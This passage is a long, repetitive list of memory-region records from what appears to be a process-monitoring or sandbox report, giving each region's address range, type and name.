0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2912 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2913 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2914 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2916 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2917 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2918 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2920 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2921 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2922 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2924 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2925 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2926 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2927 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2928 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2929 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2930 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2931 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2932 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2933 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2934 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2936 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2937 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2938 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2940 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2941 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2942 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2944 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2945 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2946 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2948 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2949 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2950 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2952 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2953 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2956 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2957 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2960 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2961 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2964 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2965 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2968 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2969 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2973 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2976 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2977 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2980 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2981 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2984 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2985 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2988 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2989 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2992 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2993 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2996 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2997 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3000 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3001 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3004 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3005 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3008 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3009 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3012 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3013 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3016 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3017 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3020 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3021 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3024 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3025 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3028 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3029 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3032 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3033 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3036 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3037 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3040 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3041 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3044 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3045 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3048 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3049 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3052 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3053 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3056 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3057 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3059 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3060 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3061 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3063 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3064 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3065 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3068 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3069 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3072 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3073 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3076 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3077 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3080 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3081 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3084 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3085 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3088 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3089 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3092 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3093 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3096 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3097 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3099 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3100 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3101 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3104 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3105 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3108 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3109 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3110 start_va = 